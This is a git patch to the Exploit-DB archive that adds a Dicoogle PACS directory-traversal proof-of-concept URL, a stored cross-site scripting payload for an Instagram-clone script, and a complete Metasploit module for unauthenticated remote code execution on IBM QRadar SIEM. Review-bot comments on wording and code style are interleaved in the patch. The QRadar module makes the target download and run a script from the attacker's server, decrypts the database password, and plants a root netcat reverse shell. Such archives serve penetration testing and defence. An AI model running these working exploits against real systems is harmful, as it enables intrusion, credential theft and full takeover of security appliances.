From 52954b47519605a2d088e8147108f96c2c5b5659 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 12 Jul 2018 05:01:59 +0000 Subject: [PATCH] DB: 2018-07-12 5 changes to exploits/shellcodes Nibbleblog - Arbitrary File Upload (Metasploit) Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit) Nibbleblog - Multiple SQL Injections Nibbleblog 3 - Multiple SQL Injections Instagram-Clone Script 2.0 - Cross-Site Scripting Dicoogle PACS 2.5.0 - Directory Traversal --- exploits/hardware/local/44206.c | 2 +- exploits/linux/local/44205.md | 2 +- exploits/linux/webapps/45007.txt | 19 +++ exploits/php/webapps/45003.txt | 36 +++++ exploits/unix/remote/45005.rb | 228 +++++++++++++++++++++++++++++++ files_exploits.csv | 7 +- 6 files changed, 290 insertions(+), 4 deletions(-) create mode 100644 exploits/linux/webapps/45007.txt create mode 100644 exploits/php/webapps/45003.txt create mode 100755 exploits/unix/remote/45005.rb diff --git a/exploits/hardware/local/44206.c b/exploits/hardware/local/44206.c index 5c0a271dd..66aeae8e4 100644 --- a/exploits/hardware/local/44206.c +++ b/exploits/hardware/local/44206.c @@ -6,7 +6,7 @@ - @kr105rlz -Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip +Download: http://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip */ #include "ps4.h" diff --git a/exploits/linux/local/44205.md b/exploits/linux/local/44205.md index d62870892..9917ca7c9 100644 --- a/exploits/linux/local/44205.md +++ b/exploits/linux/local/44205.md 
@@ -13,4 +13,4 @@ $ make # Reference [Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/) -Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip \ No newline at end of file diff --git a/exploits/linux/webapps/45007.txt b/exploits/linux/webapps/45007.txt new file mode 100644 index 000000000..fca439d37 --- /dev/null +++ b/exploits/linux/webapps/45007.txt @@ -0,0 +1,19 @@ +# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal +# Date: 2018-05-25 +# Software Link: http://www.dicoogle.com/home +# Version: Dicoogle PACS 2.5.0-20171229_1522 +# Category: webapps +# Tested on: Windows 2012 R2 +# Exploit Author: Carlos Avila +# Contact: http://twitter.com/badboy_nt + +# 1. Description +# Dicoogle is an open source medical imaging repository with an extensible +# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable +# to local file inclusion. This allows an attacker to read arbitrary files that the +# web user has access to. Admin credentials aren't required. The ‘UID’ parameter +# via GET is vulnerable. + +# 2. Proof of Concept + +http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini \ No newline at end of file diff --git a/exploits/php/webapps/45003.txt b/exploits/php/webapps/45003.txt new file mode 100644 index 000000000..53726641d --- /dev/null +++ b/exploits/php/webapps/45003.txt 
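Review bot: The `# 1. Description` block in the new 45007.txt calls the issue "local file inclusion", while the `# Exploit Title` line, the `files_exploits.csv` entry and the PoC itself describe a directory traversal that returns a file's contents (`exportFile?UID=...`), not one that includes or executes it; I would reword it to `# to directory traversal (arbitrary file read) via the 'UID' parameter.` so the classification is consistent across the advisory and the index. The `%5c` sequences in the PoC are encoded backslashes, so the request as written targets the Windows deployment named under `# Tested on`; whether other platforms are affected is not shown, and the advisory could say so explicitly. A one-line remediation note for defenders (canonicalize the requested path and reject anything resolving outside the export directory) would also be worth adding.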
@@ -0,0 +1,36 @@ +# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting +# Date: 2018-07-10 +# Exploit Author: L0RD +# Vendor Homepage: https://github.com/yTakkar/Instagram-clone +# Version: 2.0 +# CVE: CVE-2018-13849 +# Tested on: Kali linux + +# POC : Persistent Cross site scripting : +# vulnerable file : edit_requests.php +# vulnerable code : + +if (isset($_POST['username'])) { + $username = preg_replace("#[<> ]#i", "", $_POST['username']); + $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']); + $surname = preg_replace("#[<> ]#i", "", $_POST['surname']); + $bio = preg_replace("#[<>]#i", "", $_POST['bio']); + $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']); + $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']); + $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']); + $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']); + $website = preg_replace("#[<>]#i", "", $_POST['website']); + $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']); + $tags = preg_replace("#[\s]#", "-", $_POST['tags']); + $session = $_SESSION['id']; + + $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio, +$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags); + $array = array("mssg" => $m); + echo json_encode($array); + } + +# We use this payload to bypass filter : +# Payload : + +"onmouseover=" alert(document.cookie) \ No newline at end of file diff --git a/exploits/unix/remote/45005.rb b/exploits/unix/remote/45005.rb new file mode 100755 index 000000000..cfaff171a --- /dev/null +++ b/exploits/unix/remote/45005.rb 
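Review bot: The new 45003.txt says `# POC : Persistent Cross site scripting` in the body, but the `# Exploit Title` line and the matching `files_exploits.csv` entry say only "Cross-Site Scripting"; the title should carry "Stored" (e.g. `# Exploit Title: Instagram-clone Script 2.0 - Stored Cross-Site Scripting`) so the impact is clear at a glance. The quoted `edit_requests.php` snippet already shows the root cause — the `preg_replace` calls are a character blacklist that only strips `<` and `>` (plus spaces on three fields) — so a short remediation line stating that the fix is contextual output encoding (for instance `htmlspecialchars` at render time) rather than input stripping would make the advisory more useful to defenders and to anyone triaging CVE-2018-13849.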
@@ -0,0 +1,228 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'securerandom' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'IBM QRadar SIEM Unauthenticated Remote Code Execution', + 'Description' => %q{ + IBM QRadar SIEM has three vulnerabilities in the Forensics web application + that when chained together allow an attacker to achieve unauthenticated remote code execution. + + The first stage bypasses authentication by fixating session cookies. + The second stage uses those authenticated sessions cookies to write a file to disk and execute + that file as the "nobody" user. + The third and final stage occurs when the file executed as "nobody" writes an entry into the + database that causes QRadar to execute a shell script controlled by the attacker as root within + the next minute. + Details about these vulnerabilities can be found in the advisories listed in References. + + The Forensics web application is disabled in QRadar Community Edition, but the code still works, + so these vulnerabilities can be exploited in all flavours of QRadar. + This module was tested with IBM QRadar CE 7.3.0 and 7.3.1. IBM has confirmed versions up to 7.2.8 + patch 12 and 7.3.1 patch 3 are vulnerable. + Due to payload constraints, this module only runs a generic/shell_reverse_tcp payload. 
+ }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'References' => + [ + ['CVE', '2016-9722'], + ['CVE', '2018-1418'], + ['CVE', '2018-1612'], + ['URL', 'https://blogs.securiteam.com/index.php/archives/3689'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2018/May/54'], + ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg22015797'] + ], + 'Targets' => + [ + [ 'IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 11', {} ], + ], + 'Payload' => { + 'Compat' => { + 'ConnectionType' => 'reverse', + } + }, + 'DefaultOptions' => { + 'SSL' => true, + # we can only run shell scripts, so set a reverse netcat payload by default + # the payload that will be run is in the first few lines of @payload + 'PAYLOAD' => 'generic/shell_reverse_tcp', + }, + 'DisclosureDate' => 'May 28 2018', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(443), + OptString.new('SRVHOST', [true, 'HTTP server address', '0.0.0.0']), + OptString.new('SRVPORT', [true, 'HTTP server port', '4448']), + ]) + end + + def check + res = send_request_cgi({ + 'uri' => '/ForensicsAnalysisServlet/', + 'method' => 'GET' + }) + + if res.nil? 
+ vprint_error 'Connection failed' + return CheckCode::Unknown + end + + if res.code == 403 + return CheckCode::Detected + end + + CheckCode::Safe + rescue ::Rex::ConnectionError + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + # Handle incoming requests from QRadar + def on_request_uri(cli, request) + print_good("#{peer} - Sending privilege escalation payload to QRadar...") + print_good("#{peer} - Sit back and relax, Shelly will come visit soon!") + send_response(cli, @payload) + end + + + # step 1 of the exploit, bypass authentication in the ForensicAnalysisServlet + def set_cookies + @sec_cookie = SecureRandom.uuid + @csrf_cookie = SecureRandom.uuid + + post_data = "#{rand_text_alpha(5..12)},#{rand_text_alpha(5..12)}," + + "#{@sec_cookie},#{@csrf_cookie}" + + res = send_request_cgi({ + 'uri' => '/ForensicsAnalysisServlet/', + 'method' => 'POST', + 'ctype' => 'application/json', + 'cookie' => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};", + 'vars_get' => + { + 'action' => 'setSecurityTokens', + 'forensicsManagedHostIps' => "#{rand(256)}.#{rand(256)}.#{rand(256)}.#{rand(256)}" + }, + 'data' => post_data + }) + + if res.nil? or res.code != 200 + fail_with(Failure::Unknown, "#{peer} - Failed to set the SEC and QRadar CSRF cookies") + end + end + + def exploit + print_status("#{peer} - Attempting to exploit #{target.name}") + + # run step 1 + set_cookies + + # let's prepare step 2 (payload) and 3 (payload exec as root) + @payload_name = rand_text_alpha_lower(3..5) + root_payload = rand_text_alpha_lower(3..5) + + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + srv_host = Rex::Socket.source_address(rhost) + else + srv_host = datastore['SRVHOST'] + end + + http_service = (datastore['SSL'] ? 
'https://' : 'http://') + srv_host + ':' + datastore['SRVPORT'].to_s + service_uri = http_service + '/' + @payload_name + + print_status("#{peer} - Starting up our web service on #{http_service} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => "/#{@payload_name}" + }}) + + @payload = %{#!/bin/bash + +# our payload that's going to be downloaded from our web server +cat < /store/configservices/staging/updates/#{root_payload} +#!/bin/bash +/usr/bin/nc -e /bin/sh #{datastore['LHOST']} #{datastore['LPORT']} & +EOF + +### below is adapted from /opt/qradar/support/changePasswd.sh +[ -z $NVA_CONF ] && NVA_CONF="/opt/qradar/conf/nva.conf" +NVACONF=`grep "^NVACONF=" $NVA_CONF 2> /dev/null | cut -d= -f2` +FRAMEWORKS_PROPERTIES_FILE="frameworks.properties" +FORENSICS_USER_FILE="config_user.xml" +FORENSICS_USER_FILE_CONFIG="$NVACONF/$FORENSICS_USER_FILE" + +# get the encrypted db password from the config +PASSWORDENCRYPTED=`cat $FORENSICS_USER_FILE_CONFIG | grep WEBUSER_DB_PASSWORD | grep -o -P '(?<=>)([\\w\\=\\+\\/]*)(?=<)'` + +QVERSION=$(/opt/qradar/bin/myver | awk -F. '{print $1$2$3}') + +AU_CRYPT=/opt/qradar/lib/Q1/auCrypto.pm +P_ENC=$(grep I_P_ENC ${AU_CRYPT} | cut -d= -f2-) +P_DEC=$(grep I_P_DEC ${AU_CRYPT} | cut -d= -f2-) + +AESKEY=`grep 'aes.key=' $NVACONF/$FRAMEWORKS_PROPERTIES_FILE | cut -c9-` + +#if 7.2.8 or greater, use new method for hashing and salting passwords +if [[ $QVERSION -gt 727 || -z "$AESKEY" ]] +then + PASSWORD=$(perl <(echo ${P_DEC} | base64 -d) <(echo ${PASSWORDENCRYPTED})) + [ $? != 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255 +else + + PASSWORD=`/opt/qradar/bin/runjava.sh -Daes.key=$AESKEY com.q1labs.frameworks.crypto.AESUtil decrypt $PASSWORDENCRYPTED` + [ $? 
!= 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255 +fi + +PGPASSWORD=$PASSWORD /usr/bin/psql -h localhost -U qradar qradar -c \ +"insert into autoupdate_patch values ('#{root_payload}',#{rand(1000)+100},'minor',false,#{rand(9999)+100},0,'',1,false,'','','',false)" + +# kill ourselves! +(sleep 2 && rm -- "$0") & +} + + # let's do step 2 then, ask QRadar to download and execute our payload + print_status("#{peer} - Asking QRadar to download and execute #{service_uri}") + + exec_cmd = "$(mkdir -p /store/configservices/staging/updates && wget --no-check-certificate -O " + + "/store/configservices/staging/updates/#{@payload_name} #{service_uri} && " + + "/bin/bash /store/configservices/staging/updates/#{@payload_name})" + + payload_step2 = "pcap[0][pcap]" + + "=/#{rand_text_alpha_lower(2..6) + '/' + rand_text_alpha_lower(2..6)}" + + "&pcap[1][pcap]=#{Rex::Text::uri_encode(exec_cmd, 'hex-all')}" + + uri_step2 = "/ForensicsAnalysisServlet/?forensicsManagedHostIps" + + "=127.0.0.1/forensics/file.php%3f%26&action=get&slavefile=true" + + res = send_request_cgi({ + 'uri' => uri_step2 + '&' + payload_step2, + 'method' => 'GET', + 'cookie' => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};", + }) + + # now we just sit back and wait for step 2 payload to be downloaded and executed + # ... and then step 3 to complete. Let's give it a little more than a minute. + Rex.sleep 80 + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 34e62982a..fa99ce043 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
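Review bot: In `exploit`, the step-2 `send_request_cgi` result is assigned to `res` but never inspected, so a failed request is only noticed after `Rex.sleep 80` elapses with nothing to show, whereas `set_cookies` checks the response and calls `fail_with`. At minimum `fail_with(Failure::Unknown, "#{peer} - Step 2 request failed") if res.nil?` before the sleep would surface the failure immediately; the status a successful step-2 request returns is not shown here, so I would not assert `200` without confirming it. As a point of style, `if res.nil? or res.code != 200` in `set_cookies` and the `or` in the `SRVHOST` test use the low-precedence keyword where RuboCop's Style/AndOr expects `||`, and `Proc.new { |cli, req| ... }` in `start_service` can simply be `proc { ... }`. The bare `80` also deserves a comment tying it to the once-a-minute trigger the description mentions, since the existing comment only says "a little more than a minute".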
@@ -15940,7 +15940,7 @@ id,file,description,date,author,type,platform,port
 38453,exploits/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",remote,hardware,
 38464,exploits/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Vulnerabilities",2013-04-15,"Phil Purviance",remote,hardware,
 38481,exploits/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",remote,hardware,
-38489,exploits/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload (Metasploit)",2015-10-19,Metasploit,remote,php,
+38489,exploits/php/remote/38489.rb,"Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)",2015-10-19,Metasploit,remote,php,
 38492,exploits/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",remote,hardware,
 38495,exploits/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",remote,hardware,
 38500,exploits/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",remote,windows,
@@ -16607,6 +16607,7 @@ id,file,description,date,author,type,platform,port
 44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
 45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
 45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
+45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -35166,7 +35167,7 @@ id,file,description,date,author,type,platform,port
 35861,exploits/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,webapps,php,
 35862,exploits/php/webapps/35862.txt,"miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",webapps,php,
 35863,exploits/php/webapps/35863.php,"MyBloggie 2.1.6 - HTML Injection / SQL Injection",2011-06-15,"Robin Verton",webapps,php,
-35865,exploits/php/webapps/35865.txt,"Nibbleblog - Multiple SQL Injections",2011-06-19,KedAns-Dz,webapps,php,
+35865,exploits/php/webapps/35865.txt,"Nibbleblog 3 - Multiple SQL Injections",2011-06-19,KedAns-Dz,webapps,php,
 35866,exploits/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,webapps,php,
 35867,exploits/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,webapps,php,
 35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php,
@@ -39642,3 +39643,5 @@ id,file,description,date,author,type,platform,port
 44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple,
 44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
+45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
+45007,exploits/linux/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,linux,